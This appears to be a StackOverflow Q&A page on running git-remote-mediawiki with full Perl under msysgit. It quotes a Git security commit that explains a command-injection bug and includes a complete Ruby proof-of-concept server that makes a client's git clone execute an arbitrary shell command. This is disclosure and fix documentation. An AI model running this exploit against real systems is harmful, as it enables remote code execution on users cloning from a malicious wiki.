Use full perl libraries in msysgit for git-remote-mediawiki

StackOverflow https://stackoverflow.com/questions/15847076

  •  01-04-2022
  •  | 
  •  

Question

msysgit ships minimal perl libraries.

I want to download some packages from CPAN so I need to use full perl libraries.

How to do that?

More specifically, I want to use git-remote-mediawiki plugin. That's why a full installation of perl libraries is needed.

Was it helpful?

Solution

Check first (as in this article), if modifying PERL5LIB environment variable to reference that script is enough (modify the git-cmd.bat) :

set PERL5LIB = c:\path\to\git\contrib

Otherwise, for an external contrib perl script, like git-remote-mediawiki, you can try and execute it from a DOS session, with any recent Perl distribution installed.
(like Strawberry Perl, as mob recommends in the comment).

I would recommend using an git-cmd.bat (which properly set git PATH and HOME), with your own perl added first:

@set PATH=%git_install_root%\bin;%git_install_root%\mingw\bin;%git_install_root%\cmd;%PATH%
# let's add our perl:
@set PATH=path/to/yourPerl;%PATH%

This is independent of the msysgit installation, which relies on an old perl for reason explained in the FAQ.

The reason is that we need to have an MSys version of Perl because we did not manage to compile the Subversion modules (which are written in C using POSIX features plain Windows does not offer, hence the need for MSys).

That seemed enough to get the script started, but the OP linquize adds in the comments:

I end up writing a wrapper program git-remote-mediawiki.exe to call the external perl and need to convert CRLF to LF before writing to stdout to git, otherwise git hangs if CRLF is received.

Note: git-remote-mediawiki is more robust with Git 2.29 (Q4 2020), and some modernization and fixes to MediaWiki remote backend.

See commit 9a86064, commit 878d150, commit 4842a11, commit 2d6b08a, commit f8ab018, commit 1d42b4d, commit 2388541, commit 4f80bc9, commit dde66eb, commit 9ff2958, commit 730ecc1, commit 090850e, commit 128efae, commit 5e87dce, commit e35973b (21 Sep 2020), and commit 872977b, commit 442f5aa (16 Sep 2020) by Ævar Arnfjörð Bjarmason (avar).
See commit 96653ce (21 Sep 2020) by Simon Legner (simon04).
(Merged by Junio C Hamano -- gitster -- in commit 5a25615, 04 Oct 2020)

For example:

remote-mediawiki: convert to quoted run_git() invocation

Reported-by: Joern Schneeweisz
Signed-off-by: Ævar Arnfjörð Bjarmason

Change those callsites that are able to call run_safe() with a quoted list of arguments to do so.

This fixes a RCE (Remote Code Execution) bug in this transport helper reported by Joern Schneeweisz to the git-security mailing list.
The issue is being made public due to the relative obscurity of the remote-mediawiki code.

The security issue is that we'd execute a command like this via Perl's "open -|", where the $name is taken directly from the api.php response. So that a JSON response of e.g.:

[...]"title":"`id>/tmp/mw`:Main Page"[..]

Would result in an invocation of:

git config --add remote.origin.namespaceCache "`id>/tmp/mw`:notANameSpace"

From code such as this, which is being changed by this patch:

run_git(qq(config --add remote.${remotename}.namespaceCache "${name}:${store_id}"));

So we'd execute an arbitrary command, and also put "remote.origin.namespaceCache=:notANameSpace" in the config.
With this change we quote all of this, so now we'll simply write "remote.origin.namespaceCache=``id>/tmp/x``:notANameSpace" into the config, and not execute any remote commands.

About the implementation: as noted in "Opening a filehandle into a command" (see also "Safe Pipe Opens"), this style of invoking open() has compatibility issues on Windows up to Perl 5.22.
However, Johannes Schindelin notes that we shouldn't worry about Windows in this context because (quoting a private E-Mail of his):

  1. The mediawiki helper has never been shipped as part of an official Git for Windows version. Neither has it ever been part of an official MSYS2 package. Which means that Windows users who want to use the mediawiki helper have to build Git themselves, which not many users seem to do.

  2. The last Git for Windows version to ship with Perl v5.22.x was Git for Windows v2.11.1; Since Git for Windows v2.12.0 (released on February 25th, 2017), only newer Perl versions were included.

So let's just use this open() API.
Grepping around shows that various other Perl code we ship such as gitweb etc. uses this way of calling open(), so we shouldn't have any issues with compatibility.

For further reference and future testing, here's working exploit code provided by Joern:

#!/usr/bin/ruby
# git client side RCE via `mediawiki` remote proof of concept
# Joern Schneeweisz - GitLab Security Research Team  

require 'sinatra'
set bind: '0.0.0.0'  

if not ARGV[0]  

puts "Please provide the shell command to be execucted."
exit -1  

end  

cmd = ARGV[0]
all_pages = sprintf('{"limits":{"allpages":500},"query":{"allpages":[{"pageid":1,"ns":3,"title":"`%s`:Main Page"}]}}', cmd)
revs = sprintf('{"query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0,"user":"MediaWiki default","timestamp":"2020-09-04T20:25:08Z","contentformat":"text/x-wiki","contentmodel":"wikitext","comment":"","*":"<al:MyLanguage/Help:Contents]"}]}}}}', cmd)
mainpage= sprintf('{"batchcomplete":"","query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0}]}}}}',cmd)  

post '/api.php' do  

if params[:list] == 'allpages'
  return all_pages
end  

if params[:prop] == 'revisions'
  return revs
end  

return mainpage
end

Which:

[...] should be run like: ruby wiki.rb 'id>/tmp/mw'.
Now when being cloned with git clone mediawiki::http://localhost:4567 the file /tmp/mw will be created during the clone process, containing the output of id.

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow
scroll top